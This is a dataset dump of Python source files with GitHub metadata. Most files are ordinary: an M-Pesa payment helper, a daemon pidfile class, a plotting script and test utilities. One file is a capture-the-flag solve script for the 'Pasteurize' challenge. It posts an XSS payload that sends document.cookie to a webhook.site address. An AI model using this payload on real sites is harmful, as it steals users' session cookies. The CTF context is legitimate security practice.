hexsha
stringlengths 40
40
| size
int64 5
2.06M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
248
| max_stars_repo_name
stringlengths 5
125
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
248
| max_issues_repo_name
stringlengths 5
125
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
248
| max_forks_repo_name
stringlengths 5
125
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 5
2.06M
| avg_line_length
float64 1
1.02M
| max_line_length
int64 3
1.03M
| alphanum_fraction
float64 0
1
| count_classes
int64 0
1.6M
| score_classes
float64 0
1
| count_generators
int64 0
651k
| score_generators
float64 0
1
| count_decorators
int64 0
990k
| score_decorators
float64 0
1
| count_async_functions
int64 0
235k
| score_async_functions
float64 0
1
| count_documentation
int64 0
1.04M
| score_documentation
float64 0
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
b0c74b2e81942f6fdda3626e4e0173d3f260b19b
| 1,328
|
py
|
Python
|
client/query_modules/music_module.py
|
abhishekg785/hiro
|
950224d07797740b8840316bb412c1827eab46f0
|
[
"MIT"
] | 7
|
2017-04-12T10:58:42.000Z
|
2021-10-03T18:07:29.000Z
|
client/query_modules/music_module.py
|
abhishekg785/hiro
|
950224d07797740b8840316bb412c1827eab46f0
|
[
"MIT"
] | null | null | null |
client/query_modules/music_module.py
|
abhishekg785/hiro
|
950224d07797740b8840316bb412c1827eab46f0
|
[
"MIT"
] | 5
|
2017-07-06T12:28:10.000Z
|
2020-01-07T19:45:25.000Z
|
# simply handles the reply for hello by the user
import re
import random
import os
import sys
import webbrowser
from random import randint
# getting the watson api functions here
PATH = os.path.normpath(os.path.join(os.path.dirname(os.path.abspath(__file__)), os.pardir))
sys.path.append(PATH)
MUSIC_PATH = os.path.normpath(os.path.join(os.path.dirname(os.path.abspath(__file__)), os.pardir)) + '/music/'
# print MUSIC_PATH
from watson import WatsonAPI
watson = WatsonAPI()
# take necessary actions
def handle(text, audio):
print 'Handling music module'
""" fetch the text and get the emotion of the user
go to the corresponding music dir and fetch the music
play the music dud :)
"""
tone = str(watson.tone_analyzer_api(text))
music_list = os.listdir(MUSIC_PATH + tone + '/')
music_list_len = len(music_list)
if music_list_len > 0:
audio.speak('You seem to be ' + tone + '.I am playing a song for you!')
random_index = randint(0, music_list_len - 1)
print random_index
webbrowser.open(MUSIC_PATH + tone + '/' + music_list[random_index])
else:
audio.speak('No music found')
# validate the module for the text from the source ( user, server, bot etc )
def isValid(text):
return bool(re.search(r'\bmusic|melod|song|songs|tune\b', text, re.IGNORECASE))
| 30.181818
| 110
| 0.709337
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 483
| 0.363705
|
b0c77869671d10fbedbed340a7a7c9b4e8912459
| 2,993
|
py
|
Python
|
ocdsapi_outlet/utils.py
|
openprocurement/ocdsapi_outlet
|
e5aab856fbb833d34c4d56831cad7c09d7719a5e
|
[
"Apache-2.0"
] | null | null | null |
ocdsapi_outlet/utils.py
|
openprocurement/ocdsapi_outlet
|
e5aab856fbb833d34c4d56831cad7c09d7719a5e
|
[
"Apache-2.0"
] | 6
|
2019-12-26T16:43:14.000Z
|
2022-03-21T22:16:25.000Z
|
ocdsapi_outlet/utils.py
|
openprocurement/ocdsapi_outlet
|
e5aab856fbb833d34c4d56831cad7c09d7719a5e
|
[
"Apache-2.0"
] | 1
|
2018-07-27T16:19:27.000Z
|
2018-07-27T16:19:27.000Z
|
""" utils.py - helper functions """
import logging
import functools
import operator
from repoze.lru import lru_cache
from gevent import spawn
from gevent.subprocess import Popen, PIPE
try:
import boto3
except ImportError:
boto3 = None
def dump(app, logger):
"""
Run dump script as separate process
"""
def read_stream(stream):
try:
while not stream.closed:
line = stream.readline()
if not line:
break
line = line.rstrip().decode('utf-8')
logger.info(line.split(' - ')[-1])
except:
pass
args = prepare_pack_command(app.config)
logger.warn("Going to start dump with args {}".format(args))
popen = Popen(args, stdout=PIPE, stderr=PIPE)
spawn(read_stream, popen.stdout)
spawn(read_stream, popen.stderr)
popen.wait()
return_code = popen.returncode
logger.info("Dumper ended work with code {}".format(return_code))
def setup_logger(
logger,
handler,
level,
formatter,
filename):
if filename:
handler = functools.partial(handler, filename)
handler = handler()
if formatter:
handler.setFormatter(logging.Formatter(formatter))
logger.addHandler(handler)
logger.setLevel(getattr(logging, level.upper()))
return logger
def find_package_date(releases):
""" Find max date inside package """
return max(
releases,
key=operator.itemgetter('date')
).get('date')
def prepare_package(date, metainfo=None):
""" Prepare metainfo for package """
base = {
'publishedDate': date,
'releases': [],
'publisher': {
'name': '',
'scheme': '',
'uri': ''
},
}
if metainfo:
base.update(metainfo)
return base
@lru_cache(maxsize=1)
def connect_bucket(cfg):
""" TODO: do we really need this? """
return (
cfg.bucket,
boto3.client('s3')
)
def prepare_pack_command(cfg):
base_bin = cfg.get('bin_path', 'ocds-pack')
base_args = [
base_bin,
'--package-meta',
cfg.get('dump', {}).get('metainfo_file', 'meta.yml')
]
for key in ('clean_up', 'with_zip', 'count'):
if cfg.get('dump', {}).get(key):
base_args.extend([
'--{}'.format(key.replace('_', '-')),
str(cfg['dump'][key])
])
db_args = [
item
for arg, value in cfg.get('db').items()
for item in '--{} {}'.format(arg.replace('_', '-'), value).split()
]
backend = list(cfg.get('backend', {'fs': ''}).keys())[0]
backend_args = [backend]
backend_args.extend([
item
for arg, value in cfg['backend'][backend].items()
for item in '--{} {}'.format(arg.replace('_', '-'), value).split()
])
for args in db_args, backend_args:
base_args.extend(args)
return base_args
| 25.364407
| 74
| 0.559973
| 0
| 0
| 0
| 0
| 158
| 0.05279
| 0
| 0
| 527
| 0.176078
|
b0c81b1e5cf0bc462adf9bdbb74fbefc166b797e
| 264
|
py
|
Python
|
apps/logger.py
|
dabble-of-devops-bioanalyze/single-cell-cloud-lab
|
324bf936297b6a5bd23d4f7e1cf3cbd6b31ba495
|
[
"Apache-2.0"
] | null | null | null |
apps/logger.py
|
dabble-of-devops-bioanalyze/single-cell-cloud-lab
|
324bf936297b6a5bd23d4f7e1cf3cbd6b31ba495
|
[
"Apache-2.0"
] | null | null | null |
apps/logger.py
|
dabble-of-devops-bioanalyze/single-cell-cloud-lab
|
324bf936297b6a5bd23d4f7e1cf3cbd6b31ba495
|
[
"Apache-2.0"
] | null | null | null |
import colorlog
handler = colorlog.StreamHandler()
handler.setFormatter(
colorlog.ColoredFormatter(
"%(log_color)s%(levelname)s:%(name)s:%(filename)s:%(funcName)s: %(message)s"
)
)
logger = colorlog.getLogger(__name__)
logger.addHandler(handler)
| 22
| 84
| 0.719697
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 76
| 0.287879
|
b0c97b770b216db5c6e4a8a50cbc39cc9f11e3a2
| 1,467
|
py
|
Python
|
venv/lib/python2.7/site-packages/daemon/pidfile.py
|
mutaihillary/mycalculator
|
55685dd7c968861f18ae0701129f5af2bc682d67
|
[
"MIT"
] | null | null | null |
venv/lib/python2.7/site-packages/daemon/pidfile.py
|
mutaihillary/mycalculator
|
55685dd7c968861f18ae0701129f5af2bc682d67
|
[
"MIT"
] | 7
|
2021-02-08T20:22:15.000Z
|
2022-03-11T23:19:41.000Z
|
venv/lib/python2.7/site-packages/daemon/pidfile.py
|
mutaihillary/mycalculator
|
55685dd7c968861f18ae0701129f5af2bc682d67
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# daemon/pidfile.py
# Part of python-daemon, an implementation of PEP 3143.
#
# Copyright © 2008–2010 Ben Finney <ben+python@benfinney.id.au>
#
# This is free software: you may copy, modify, and/or distribute this work
# under the terms of the Python Software Foundation License, version 2 or
# later as published by the Python Software Foundation.
# No warranty expressed or implied. See the file LICENSE.PSF-2 for details.
""" Lockfile behaviour implemented via Unix PID files.
"""
from __future__ import absolute_import
from lockfile.pidlockfile import PIDLockFile
class TimeoutPIDLockFile(PIDLockFile, object):
""" Lockfile with default timeout, implemented as a Unix PID file.
This uses the ``PIDLockFile`` implementation, with the
following changes:
* The `acquire_timeout` parameter to the initialiser will be
used as the default `timeout` parameter for the `acquire`
method.
"""
def __init__(self, path, acquire_timeout=None, *args, **kwargs):
""" Set up the parameters of a TimeoutPIDLockFile. """
self.acquire_timeout = acquire_timeout
super(TimeoutPIDLockFile, self).__init__(path, *args, **kwargs)
def acquire(self, timeout=None, *args, **kwargs):
""" Acquire the lock. """
if timeout is None:
timeout = self.acquire_timeout
super(TimeoutPIDLockFile, self).acquire(timeout, *args, **kwargs)
| 34.116279
| 75
| 0.691888
| 863
| 0.587075
| 0
| 0
| 0
| 0
| 0
| 0
| 909
| 0.618367
|
b0c9cd685e3c553d9d38e5a73ed8bdcbc7f01131
| 11,258
|
py
|
Python
|
zazi/apps/mpesa/utils/transaction.py
|
felixcheruiyot/zazi-core-banking
|
0a2dac42235adcac3cf8c114961e407f54844223
|
[
"Apache-2.0"
] | null | null | null |
zazi/apps/mpesa/utils/transaction.py
|
felixcheruiyot/zazi-core-banking
|
0a2dac42235adcac3cf8c114961e407f54844223
|
[
"Apache-2.0"
] | 1
|
2021-08-20T06:41:57.000Z
|
2021-08-20T06:41:57.000Z
|
zazi/apps/mpesa/utils/transaction.py
|
felixcheruiyot/zazi-core-banking
|
0a2dac42235adcac3cf8c114961e407f54844223
|
[
"Apache-2.0"
] | null | null | null |
import logging
from django.db import transaction as db_transaction
from django.conf import settings
from django.utils import timezone
from django.urls import reverse_lazy
from zazi.core.utils import get_absolute_url, get_encrypted_text
from .. import api
from ..models import (
MpesaAccount,
MpesaAccountBalance,
MpesaAccountRegisteredURL,
MpesaAPIAccount,
MpesaTransaction,
generate_id)
from ..enums import IdentifierType, CommandID, ResultCode, MpesaTransactionStatus
logger = logging.getLogger(__name__)
def get_mpesa_webhook_url(url_name, kwargs=None, endpoint=None):
logger.debug(f'get_mpesa_webhook_url({url_name}, kwargs={kwargs}, endpoint={endpoint})')
return get_absolute_url(url_name, kwargs=kwargs, endpoint=settings.MPESA_PROXY_URL)
def request_b2b_transaction(
sender_short_code,
receiver_short_code,
amount,
user,
mpesa_receipt_number=None,
account_reference=None,
transaction_category=None,
command_id=CommandID.B2B_BUSINESS_TO_BUSINESS_TRANSFER,
remarks=None,
):
with db_transaction.atomic():
sender_account = MpesaAPIAccount.objects.get(
organization__owner=user,
identifier=sender_short_code,
identifier_type=IdentifierType.BUSINESS_PAYBILL)
recipient_account = MpesaAPIAccount.objects.get(
organization__owner=user,
identifier=receiver_short_code,
identifier_type=IdentifierType.BUSINESS_PAYBILL)
return MpesaTransaction.objects.create(
transaction_id=generate_id(),
command_id=command_id,
mpesa_receipt_number=mpesa_receipt_number,
sender_account=sender_account,
recipient_account=recipient_account,
transaction_time=timezone.now(),
transaction_amount=amount)
def request_b2c_transaction(
organization_id,
sender_short_code,
receiver_phone_number,
amount,
user,
transaction_id=None,
account_reference=None,
transaction_category=None,
command_id=CommandID.B2C_BUSINESS_PAYMENT,
remarks=None,
):
logger.info("request_b2c_transaction %s %s %s %s" % (
organization_id,
sender_short_code,
receiver_phone_number,
amount
))
with db_transaction.atomic():
sender_account = MpesaAccount.objects.get(
organization__owner=user,
organization__organization_id=organization_id,
identifier=sender_short_code,
identifier_type=IdentifierType.BUSINESS_PAYBILL)
recipient_account = MpesaAccount.objects.get(
identifier=receiver_phone_number,
identifier_type=IdentifierType.PERSONAL_MPESA)
transaction_id = transaction_id or generate_id()
mpesa_api_account = sender_account.api_account
queue_timeout_url = get_mpesa_webhook_url('mpesa:mpesa_b2c_queue_timeout_url', kwargs={
"organization_id": organization_id,
"reference": transaction_id
})
result_url = get_mpesa_webhook_url('mpesa:mpesa_b2c_result_url', kwargs={
"organization_id": organization_id,
"reference": transaction_id
})
security_credential = get_encrypted_text(
mpesa_api_account.security_credential,
function_name="zazi-certificate-microservice-dev-encrypt_text")
if not security_credential:
raise Exception("Error accessing securty credentials for M-Pesa account %s" % mpesa_api_account.account_id)
else:
logger.info("Security credential received for %s" % sender_account.account_id)
request_payload = api.b2c_transact(
env="production" if sender_account.api_account.in_production else "sandbox",
app_key=mpesa_api_account.consumer_key,
app_secret=mpesa_api_account.consumer_secret,
initiator_name=mpesa_api_account.username,
security_credential=security_credential,
command_id=command_id,
party_a=sender_account.identifier,
party_b=recipient_account.identifier,
amount=amount,
remarks=remarks,
account_reference=account_reference,
queue_timeout_url=queue_timeout_url,
result_url=result_url)
transaction = MpesaTransaction.objects\
.create(
command_id=command_id,
transaction_category=transaction_category,
transaction_id=transaction_id,
sender_account=sender_account,
result_code=ResultCode.success,
status=MpesaTransactionStatus.PENDING,
initiated_at=timezone.now(),
recipient_account=recipient_account)
if request_payload:
logger.info(request_payload)
transaction.request_payload = {
"conversation_id": request_payload["ConversationID"],
"originator_conversation_id": request_payload["OriginatorConversationID"],
"response_code": ResultCode(int(request_payload["ResponseCode"])),
"response_description": request_payload["ResponseDescription"]
}
transaction.save()
else:
transaction.request_payload = request_payload
transaction.save()
return transaction
def request_mpesa_express_stk_push(
organization_id,
short_code,
phone_number,
amount,
transaction_category=None,
reference_code=None,
description=None,
):
with db_transaction.atomic():
business_account = MpesaAccount.objects.get(
organization__organization_id=organization_id,
identifier=short_code,
identifier_type=IdentifierType.BUSINESS_PAYBILL)
personal_account = MpesaAccount.objects.get(
identifier=phone_number,
identifier_type=IdentifierType.PERSONAL_MPESA)
lipa_na_mpesa_account = business_account.lipa_na_mpesa_accounts.first()
reference = generate_id()
request_payload = api.mpesa_express_stk_push(
env="production" if business_account.api_account.in_production else "sandbox",
app_key=business_account.api_account.consumer_key,
app_secret=business_account.api_account.consumer_secret,
business_shortcode=short_code,
passcode=lipa_na_mpesa_account.pass_code,
amount=amount,
callback_url=get_mpesa_webhook_url('mpesa:mpesa_c2b_stk_push_callback_url', kwargs={
"organization_id": organization_id,
"reference": reference
}),
reference_code=reference_code or reference,
phone_number=phone_number,
description=description)
transaction = MpesaTransaction.objects.create(
transaction_id=reference,
command_id=CommandID.C2B_PAYBILL,
transaction_category=transaction_category,
sender_account=personal_account,
recipient_account=business_account,
status=MpesaTransactionStatus.PENDING,
initiated_at=timezone.now(),
transaction_amount=amount,
request_payload=request_payload)
if request_payload.get("errorCode") is None:
transaction.request_payload = {
"merchant_request_id": request_payload["MerchantRequestID"],
"checkout_request_id": request_payload["CheckoutRequestID"],
"response_code": ResultCode(int(request_payload["ResponseCode"])),
"response_description": request_payload["ResponseDescription"],
"customer_message": request_payload["CustomerMessage"]
}
transaction.save()
else:
transaction.request_payload = request_payload
transaction.save()
logger.debug(request_payload)
return transaction
def request_transaction_reverse(
transaction_id,
mpesa_user,
remarks=None,
occassion=None
):
with db_transaction.atomic():
organization_id = mpesa_user.organization.organization_id
transaction = MpesaTransaction.objects.get(
transaction_id=transaction_id)
response = api.transaction_reverse(
env="production" if transaction.sender_account.in_production else "sandbox",
app_key=None,
app_secret=None,
receiver_party=None,
initiator=None,
security_credential=None,
command_id=None,
transaction_id=None,
receiver_identifier_type=None,
amount=None,
result_url=get_mpesa_webhook_url('mpesa_balance_check_result_url', kwargs={
"organization_id": organization_id,
"reference": transaction.transaction_id
}),
queue_timeout_url=get_mpesa_webhook_url('mpesa_balance_check_queue_timeout_url', kwargs={
"organization_id": organization_id,
"reference": transaction.transaction_id
}),
remarks=remarks,
occassion=occassion)
transaction_reference = generate_id()
return MpesaTransaction.objects.create(
command_id=CommandID.UTILITY_TRANSACTION_REVERSAL,
transaction_id=transaction_reference,
initiator=mpesa_user,
status=MpesaTransactionStatus.PENDING,
initiated_at=timezone.now(),
request_payload=response)
def request_check_transaction_status(
transaction_id,
mpesa_user,
remarks=None
):
with db_transaction.atomic():
organization_id = mpesa_user.organization.organization_id
transaction = MpesaTransaction.objects.get(
transaction_id=transaction_id)
response = api.check_transaction_status(
env="production" if transaction.sender_account.in_production else "sandbox",
app_key=transaction.api_account.consumer_key,
app_secret=transaction.api_account.consumer_secret,
identifier_type=transaction.sender_account.identifier_type,
initiator=transaction.initiator.username,
party_a=transaction.sender_account.identifier,
remarks=remarks,
result_url=get_mpesa_webhook_url('mpesa_check_status_result_url', kwargs={
"organization_id": organization_id,
"reference": transaction.mpesa_receipt_number
}),
queue_timeout_url=get_mpesa_webhook_url('mpesa_check_status_queue_timeout_url', kwargs={
"organization_id": organization_id,
"reference": transaction.mpesa_receipt_number
}))
transaction_reference = generate_id()
return MpesaTransaction.objects.create(
command_id=CommandID.UTILITY_TRANSACTION_STATUS_QUERY,
transaction_id=transaction_reference,
initiator=mpesa_user,
status=MpesaTransactionStatus.PENDING,
initiated_at=timezone.now(),
request_payload=response)
| 38.162712
| 119
| 0.669213
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,134
| 0.100728
|
b0cb0c2e438281324253c5fc9aef08d9586a6478
| 297
|
py
|
Python
|
gCTF/gctf20/Pasteurize/asd.py
|
shagunattri/ctfwriteups
|
02654f9feeef43aa28c321a7bd9c13a39be8f137
|
[
"MIT"
] | 1
|
2020-06-11T18:04:22.000Z
|
2020-06-11T18:04:22.000Z
|
gCTF/gctf20/Pasteurize/asd.py
|
shagunattri/MemeBoard
|
02654f9feeef43aa28c321a7bd9c13a39be8f137
|
[
"MIT"
] | 1
|
2021-03-22T09:51:13.000Z
|
2021-03-22T09:51:13.000Z
|
gCTF/gctf20/Pasteurize/asd.py
|
shagunattri/MemeBoard
|
02654f9feeef43aa28c321a7bd9c13a39be8f137
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
#JOHN Hammond method result
import requests
url = "https://pasteurize.web.ctfcompetition.com/"
req = requests.post(url,data = {
"content[]": ";new Image().src='https://webhook.site/8db05257-6ad1-44a9-979a-574c1caca5d6?asdf='+document.cookie//"
})
print(req.text)
| 18.5625
| 119
| 0.703704
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 206
| 0.693603
|
b0cb84a469618ec441c72fc62b1918615cc6f4ec
| 7,437
|
py
|
Python
|
src/test/py/ltprg/results/plot.py
|
forkunited/ltprg
|
4e40d3571d229023df0f845c68643024e04bc202
|
[
"MIT"
] | 11
|
2017-08-03T15:42:19.000Z
|
2021-02-04T12:43:35.000Z
|
src/test/py/ltprg/results/plot.py
|
forkunited/ltprg
|
4e40d3571d229023df0f845c68643024e04bc202
|
[
"MIT"
] | null | null | null |
src/test/py/ltprg/results/plot.py
|
forkunited/ltprg
|
4e40d3571d229023df0f845c68643024e04bc202
|
[
"MIT"
] | 1
|
2021-02-04T12:43:37.000Z
|
2021-02-04T12:43:37.000Z
|
#!/usr/bin/python
#
# Usage: plot.py [input_file] [xlabel] [ylabel] [x] [y] [where] [where_values] [groupby]
#
# input_file: Input tsv file where the first row contains column names
# xlabel: Label for plot horizontal axis
# ylabel: Label for plot vertical axis
# x: Name of column to plot on horizontal axis
# y: Name of column to plot on vertical axis
# where: Comma-separated list of columns for which to constrain the values contained in the plot
# where_values: Comma-separated list of values by which to constrain the columns given in [where]
# groupby: Comma-separated list of columns on which to group the data into separate curves
#
# The script will generate a 2-dimensional plot containing a set of curves. Values are averaged
# across rows of data that fit the constraints given in [where] and [where_values]. The averages
# are computed for separate curves determined by the [groupby]
#
import csv
import sys
import numpy as np
from scipy import stats
from random import randint
input_file = sys.argv[1]
xlabel = sys.argv[2]
ylabel = sys.argv[3]
x = sys.argv[4]
y = sys.argv[5]
where = None
where_values = None
if len(sys.argv) > 6 and sys.argv[6] != 'None' and sys.argv[7] != 'None':
where = sys.argv[6].split(",")
where_values = sys.argv[7].split(",")
groupby = None
if len(sys.argv) > 8:
groupby = sys.argv[8].split(",")
make_table = False
if len(sys.argv) > 9:
make_table = (sys.argv[9] == "True")
def read_tsv_file(file_path):
f = open(file_path, 'rt')
rows = []
try:
reader = csv.DictReader(f, delimiter='\t')
for row in reader:
rows.append(row)
finally:
f.close()
return rows
def row_match(row, where, where_values):
if where is None:
return True
for i in range(len(where)):
if row[where[i]] != where_values[i]:
return False
return True
# Map [groupby],x -> y value list filtered by 'where'
def aggregate(rows, x, y, where, where_values, groupby):
agg = dict()
for row in rows:
if not row_match(row, where, where_values):
continue
cur_agg = agg
if groupby is not None:
for key in groupby:
if row[key] not in cur_agg:
cur_agg[row[key]] = dict()
cur_agg = cur_agg[row[key]]
x_value = row[x]
y_value = row[y]
if x_value not in cur_agg:
cur_agg[x_value] = []
cur_agg[x_value].append(float(y_value))
return agg
def compute_statistics_helper(agg, agg_depth, keys, statistics, overall_statistics):
if agg_depth == 0:
cur_stats = statistics
for key in keys:
if key not in cur_stats:
cur_stats[key] = dict()
cur_stats = cur_stats[key]
cur_stats["mu"] = np.mean(agg)
cur_stats["stderr"] = stats.sem(agg)
cur_stats["max"] = max(agg)
overall_statistics["y_max"] = max(overall_statistics["y_max"], cur_stats["mu"])
if len(keys[len(keys) - 1]) != 0:
try:
overall_statistics["x_max"] = max(overall_statistics["x_max"], float(keys[len(keys) - 1]))
except ValueError:
pass
else:
for key in agg:
keys.append(key)
compute_statistics_helper(agg[key], agg_depth - 1, keys, statistics, overall_statistics)
keys.pop()
return statistics, overall_statistics
def compute_statistics(agg, groupby):
overall_statistics = dict()
overall_statistics["y_max"] = 1.0
overall_statistics["x_max"] = 0
statistics = dict()
depth = 1
if groupby is not None:
depth = len(groupby) + 1
return compute_statistics_helper(agg, depth, [], statistics, overall_statistics)
def make_latex_plot_helper(statistics, groupby, depth, keys, s):
if depth == 0:
plot_str = "\\addplot[color=black!" + str(randint(30,100)) + ",dash pattern=on " + str(randint(1,3)) + "pt off " + str(randint(1,2)) + "pt,error bars/.cd, y dir=both,y explicit] coordinates {\n"
x_values = [float(x_value) for x_value in statistics.keys()]
x_values.sort()
for x_value in x_values:
x_str = str(int(x_value))
plot_str = plot_str + "(" + x_str + "," + str(statistics[x_str]["mu"]) + ")+-(0.0," + str(statistics[x_str]["stderr"]) + ")\n"
plot_str = plot_str + "};\n"
plot_str = plot_str + "\\addlegendentry{\\tiny{"
if groupby is not None:
for i in range(len(groupby)):
plot_str = plot_str + groupby[i] + "=" + keys[i] + " "
plot_str = plot_str.strip()
plot_str = plot_str + "}};\n\n"
return s + plot_str
else:
for key in statistics:
keys.append(key)
s = make_latex_plot_helper(statistics[key], groupby, depth - 1, keys, s)
keys.pop()
return s
def make_latex_plot(statistics, overall_statistics, xlabel, ylabel, groupby):
s = ("\\begin{figure*}[ht]\n"
"\\begin{center}\n"
"\\begin{tikzpicture}\n"
"\\begin{axis}[%\n"
"width=.5\\textwidth,height=.5\\textwidth,\n"
"anchor=origin, % Shift the axis so its origin is at (0,0)\n"
"ymin=0,ymax=" + str(overall_statistics["y_max"]) + ",xmin=0,xmax=" + str(overall_statistics["x_max"]) + ",%\n"
"xlabel=" + xlabel + ",\n"
"ylabel=" + ylabel + ",\n"
"legend pos=outer north east\n"
"]\n"
)
depth = 0
if groupby is not None:
depth = len(groupby)
s = s + make_latex_plot_helper(statistics, groupby, depth, [], "")
s = s + ("\\end{axis}\n"
"\\end{tikzpicture}\n"
"\\end{center}\n"
"\\end{figure*}\n"
)
return s
def make_aggregate_table_helper(statistics, groupby, depth, keys, s):
if depth == 0:
try:
x_values = [float(x_value) if len(x_value) != 0 else "" for x_value in statistics.keys()]
except ValueError:
x_values = [x_value for x_value in statistics.keys()]
x_values.sort()
for x_value in x_values:
x_str = str(x_value)
for key in keys:
s += key + "\t"
if x_str not in statistics:
x_str = str(int(float(x_str))) # FIXME Stupid hack for now
s += x_str + "\t" + str(statistics[x_str]["mu"]) + "\t" + str(statistics[x_str]["stderr"]) + "\t" + str(statistics[x_str]["max"]) + "\n"
return s
else:
for key in statistics:
keys.append(key)
s = make_aggregate_table_helper(statistics[key], groupby, depth - 1, keys, s)
keys.pop()
return s
def make_aggregate_table(statistics, overall_statistics, xlabel, ylabel, groupby):
s = "\t".join(groupby) + "\t" + xlabel + "\t" + ylabel + "\t" + ylabel + " (stderr)" + "\t" + ylabel + " (max)\n"
depth = 0
if groupby is not None:
depth = len(groupby)
s = s + make_aggregate_table_helper(statistics, groupby, depth, [], "")
return s
rows = read_tsv_file(input_file)
agg = aggregate(rows, x, y, where, where_values, groupby)
statistics, overall_statistics = compute_statistics(agg, groupby)
if make_table:
print(make_aggregate_table(statistics, overall_statistics, xlabel, ylabel, groupby))
else:
print(make_latex_plot(statistics, overall_statistics, xlabel, ylabel, groupby))
| 33.804545
| 202
| 0.600376
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,715
| 0.230604
|
b0cb8d6fd396de4dcda21996632c248c8e21dab4
| 320
|
py
|
Python
|
version.py
|
ERICMIAO0817/knlp
|
56052e49be87d604839d8f81a7295c73a5ac62cf
|
[
"MIT"
] | 19
|
2021-03-17T02:15:18.000Z
|
2021-12-14T04:46:21.000Z
|
version.py
|
ERICMIAO0817/knlp
|
56052e49be87d604839d8f81a7295c73a5ac62cf
|
[
"MIT"
] | 4
|
2022-03-08T16:28:18.000Z
|
2022-03-28T15:11:11.000Z
|
version.py
|
ERICMIAO0817/knlp
|
56052e49be87d604839d8f81a7295c73a5ac62cf
|
[
"MIT"
] | 7
|
2021-03-17T02:15:23.000Z
|
2022-03-17T15:41:04.000Z
|
#!/usr/bin/python
# -*- coding:UTF-8 -*-
# -----------------------------------------------------------------------#
# File Name: version.py
# Author: Junyi Li
# Mail: 4ljy@163.com
# Created Time: 2021-01-27
# Description:
# -----------------------------------------------------------------------#
__version__ = "0.2.2"
| 26.666667
| 74
| 0.34375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 295
| 0.921875
|
b0ccf531cfab6c9c4a503a8b46e7c6adcacdc203
| 1,336
|
py
|
Python
|
tests/base.py
|
abdghani995/docker-falcon
|
6e552a23c3dcc7210083cbe049a7ffbd13a888b1
|
[
"MIT"
] | 19
|
2019-12-14T20:21:03.000Z
|
2021-08-11T07:38:42.000Z
|
tests/base.py
|
abdghani995/docker-falcon
|
6e552a23c3dcc7210083cbe049a7ffbd13a888b1
|
[
"MIT"
] | 2
|
2018-05-14T23:05:11.000Z
|
2021-11-21T19:32:08.000Z
|
tests/base.py
|
vvitsenets/VICTORIA
|
843ad6cc1ecec8b0fb424263de37691454cd2b4e
|
[
"MIT"
] | 4
|
2019-12-15T05:59:57.000Z
|
2022-03-05T08:03:04.000Z
|
import unittest
import falcon
import falcon.testing
import app.util.json as json
from app import create_app
class TestBase(unittest.TestCase):
def setUp(self):
self.app = create_app()
self.srmock = falcon.testing.StartResponseMock()
def simulate_request(self, path, *args, **kwargs):
env = falcon.testing.create_environ(path, *args, **kwargs)
resp = self.app(env, self.srmock)
if len(resp) >= 1:
return json.loads(resp[0].decode("utf-8"))
return resp
def simulate_get(self, *args, **kwargs):
kwargs["method"] = "GET"
return self.simulate_request(*args, **kwargs)
def simulate_post(self, *args, **kwargs):
kwargs["method"] = "POST"
return self.simulate_request(*args, **kwargs)
def simulate_put(self, *args, **kwargs):
kwargs["method"] = "PUT"
return self.simulate_request(*args, **kwargs)
def simulate_delete(self, *args, **kwargs):
kwargs["method"] = "DELETE"
return self.simulate_request(*args, **kwargs)
def simulate_patch(self, *args, **kwargs):
kwargs["method"] = "PATCH"
return self.simulate_request(*args, **kwargs)
def simulate_head(self, *args, **kwargs):
kwargs["method"] = "HEAD"
return self.simulate_request(*args, **kwargs)
| 29.688889
| 66
| 0.627246
| 1,223
| 0.915419
| 0
| 0
| 0
| 0
| 0
| 0
| 92
| 0.068862
|
b0cef7efc960a0a20a9e808c895f9ff5b72321b6
| 1,903
|
py
|
Python
|
src/zojax/portlet/browser/portlets.py
|
Zojax/zojax.portlet
|
f442ae53c400cd39e0c593138b83eeea0d13787e
|
[
"ZPL-2.1"
] | null | null | null |
src/zojax/portlet/browser/portlets.py
|
Zojax/zojax.portlet
|
f442ae53c400cd39e0c593138b83eeea0d13787e
|
[
"ZPL-2.1"
] | null | null | null |
src/zojax/portlet/browser/portlets.py
|
Zojax/zojax.portlet
|
f442ae53c400cd39e0c593138b83eeea0d13787e
|
[
"ZPL-2.1"
] | null | null | null |
##############################################################################
#
# Copyright (c) 2009 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""
$Id$
"""
from zope import interface
from zope.location import LocationProxy
from zope.publisher.interfaces import NotFound
from zope.publisher.interfaces import IPublishTraverse
from zope.security.proxy import removeSecurityProxy
from zope.component import getAdapters, queryMultiAdapter
from zojax.statusmessage.interfaces import IStatusMessage
